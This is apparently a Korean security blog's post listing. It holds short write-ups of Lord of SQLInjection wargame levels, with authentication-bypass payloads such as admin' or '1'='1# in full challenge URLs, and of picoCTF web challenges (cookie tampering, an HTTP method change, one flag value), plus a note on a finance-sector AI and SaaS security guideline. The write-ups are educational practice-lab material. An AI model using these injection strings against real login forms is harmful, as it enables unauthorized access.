전체 글21 Lord of SQLInjection: cobolt ProblemSolve기존 구문 → GET 방식, id = adminselect id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')”변경 구문select id from prob_cobolt where id='admin' or '1'='1# and pw=md5('')”공격 구문https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin' or '1'='1# 2025. 1. 21. Lord of SQLInjection: gremlin ProblemSolve기존 구문 → GET 방식select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}’ 변경 구문select id from prob_gremlin where id='admin' and pw='admin' or '1'='1#’ 공격 구문https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=admin&pw=admin' or '1'='1 2025. 1. 21. 금융권 생성형 AI 및 SaaS의 안전한 사용 방안 가이드라인 안녕하세요! 차세대 보안리더 양성 프로그램 , Best of the Best 13기 컨설팅 트랙 ‘망나니’ 팀 입니다.이 포스팅으로 저희 팀에서 발간하게 된 가이드라인에 대해서 소개해드리고자합니다.배경 최근 금융권에서 망분리 규제완화 움직임이 본격화 되면서, 클라우드 기반 서비스(SaaS)와 생성형 AI (Generative AI)의 도입 가능성이 대두되고 있습니다. 기존에는 보안 우려로 인해 클라우드와 AI 활용이 제한적이었으나, 이번 변화로 인해서 금융 업계의 디지털 혁신을 가속화 하는 데 중요한 전환점이 될 전망입니다. 보도자료 - 위원회 소식 - 알림마당 - 금융위원회「금융분야 망분리 개선 로드맵」 발표 - 금융권 망분리 10년, “혁신과 보안의 새로운 균형으로의 도약” - 금융권도 생성형 .. 2024. 12. 12. picoCTF: Insp3ct0r(Web) Problemhint 1 : How do you inspect web code on a browser? hint 2 : There's 3 partsSolution 1. 문제 링크 접속 2. “How”를 살펴보면 HTML, CSS, JS(JavaScript)로 사이트가 구성됨을 알 수 있음 3. 개발자 도구에서 “Source”의 HTML 코드를 보면 첫 번째 flag 값 조각 발견 4. JS 코드를 보면 세 번째 flag 값 조각 발견 5. CSS 코드를 보면 번째 flag 값 조각 발견 6. flag : picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?832b0699} 결론소스 코드 분석으로 문제 해결 2024. 11. 9. picoCTF: Cookies(Web) Problem hint 1 : NoneSolution 1. 문제 링크 접속 2. “snickerdoodle” 검색 3. cookie 값이 0임을 확인 4. cookie 값을 1부터 변경 시도 5. cookie 값이 18일 때 flag 얻음 6. cookie 값이 29부터는 없음을 확인결론쿠키 값 변조로 문제 해결 2024. 11. 9. picoCTF: GET aHEAD(Web) Problemhint 1 : Maybe you have more than 2 choices hint 2 : Check out tools like Burpsuite to modify your requests and look at the responses Solution 1. 문제 링크 접속 2. proxy 잡고, “Choose Red” 클릭(아무거나 클릭해도 무방한 듯) 3. Repeater로 보냄 4. “GET” method → “HEAD” method로 변경하여 보내면 flag 획득결론Method 변경으로 문제 해결 2024. 7. 8. 이전 1 2 3 4 다음
